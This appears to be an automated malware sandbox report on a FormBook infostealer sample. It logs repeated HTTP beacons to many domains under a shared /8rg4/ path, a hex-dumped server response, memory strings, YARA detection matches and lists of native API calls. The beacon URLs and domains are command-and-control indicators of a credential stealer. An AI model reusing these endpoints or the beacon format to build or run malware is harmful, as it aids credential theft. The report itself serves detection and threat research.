Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=A4ItsHP+WlrLG/knzE1FqdRUH2iuHEJ7BxsWyFaOnTa5UmbK6eGivqtSi2ljMDHkmrx5 HTTP/1.1Host: www.bodyfuelrtd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 34.102.136.180 34.102.136.180

Source: Joe Sandbox View	ASN Name: PEGTECHINCUS PEGTECHINCUS
Source: Joe Sandbox View	ASN Name: SUPERHOST-PL-ASPL SUPERHOST-PL-ASPL
Source: Joe Sandbox View	ASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL

Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=A4ItsHP+WlrLG/knzE1FqdRUH2iuHEJ7BxsWyFaOnTa5UmbK6eGivqtSi2ljMDHkmrx5 HTTP/1.1Host: www.bodyfuelrtd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.100feetpics.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Jan 2021 19:48:51 GMTContent-Type: text/htmlContent-Length: 1417Connection: closeVary: Accept-EncodingLast-Modified: Wed, 05 Aug 2020 09:00:18 GMTETag: "589-5ac1d99d73c92"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33

Source: explorer.exe, 00000003.00000000.249758668.000000000F5C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: YvGnm93rap.exe, 00000000.00000002.227198607.000000000136A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_004181C0 NtCreateFile,	2_2_004181C0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00418270 NtReadFile,	2_2_00418270
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_004182F0 NtClose,	2_2_004182F0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_004183A0 NtAllocateVirtualMemory,	2_2_004183A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_004181BB NtCreateFile,	2_2_004181BB
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041826B NtReadFile,	2_2_0041826B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041839A NtAllocateVirtualMemory,	2_2_0041839A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F398F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_00F398F0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_00F39860
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39840 NtDelayExecution,LdrInitializeThunk,	2_2_00F39840
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F399A0 NtCreateSection,LdrInitializeThunk,	2_2_00F399A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_00F39910
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39A50 NtCreateFile,LdrInitializeThunk,	2_2_00F39A50
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39A20 NtResumeThread,LdrInitializeThunk,	2_2_00F39A20
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_00F39A00
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F395D0 NtClose,LdrInitializeThunk,	2_2_00F395D0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39540 NtReadFile,LdrInitializeThunk,	2_2_00F39540
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F396E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_00F396E0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_00F39660
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39FE0 NtCreateMutant,LdrInitializeThunk,	2_2_00F39FE0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F397A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_00F397A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39780 NtMapViewOfSection,LdrInitializeThunk,	2_2_00F39780
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39710 NtQueryInformationToken,LdrInitializeThunk,	2_2_00F39710
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F398A0 NtWriteVirtualMemory,	2_2_00F398A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F3B040 NtSuspendThread,	2_2_00F3B040
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39820 NtEnumerateKey,	2_2_00F39820
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F399D0 NtCreateProcessEx,	2_2_00F399D0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39950 NtQueueApcThread,	2_2_00F39950
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39A80 NtOpenDirectoryObject,	2_2_00F39A80
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39A10 NtQuerySection,	2_2_00F39A10
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F3A3B0 NtGetContextThread,	2_2_00F3A3B0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39B00 NtSetValueKey,	2_2_00F39B00
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F395F0 NtQueryInformationFile,	2_2_00F395F0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39560 NtWriteFile,	2_2_00F39560
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F3AD30 NtSetContextThread,	2_2_00F3AD30
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39520 NtWaitForSingleObject,	2_2_00F39520
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F396D0 NtCreateKey,	2_2_00F396D0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39670 NtQueryInformationProcess,	2_2_00F39670
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39650 NtQueryValueKey,	2_2_00F39650
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39610 NtEnumerateValueKey,	2_2_00F39610
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F3A770 NtOpenThread,	2_2_00F3A770
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39770 NtSetInformationFile,	2_2_00F39770
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39760 NtOpenProcess,	2_2_00F39760
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F39730 NtQueryVirtualMemory,	2_2_00F39730
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F3A710 NtOpenProcessToken,	2_2_00F3A710

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 0_2_00B38D5D	0_2_00B38D5D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 0_2_0133CAE4	0_2_0133CAE4
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 0_2_0133EEB0	0_2_0133EEB0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_004012FB	2_2_004012FB
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041CB86	2_2_0041CB86
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00408C5B	2_2_00408C5B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041C59E	2_2_0041C59E
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041B69A	2_2_0041B69A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00468D5D	2_2_00468D5D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC28EC	2_2_00FC28EC
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F220A0	2_2_00F220A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC20A8	2_2_00FC20A8
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0B090	2_2_00F0B090
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A830	2_2_00F1A830
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FCE824	2_2_00FCE824
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1002	2_2_00FB1002
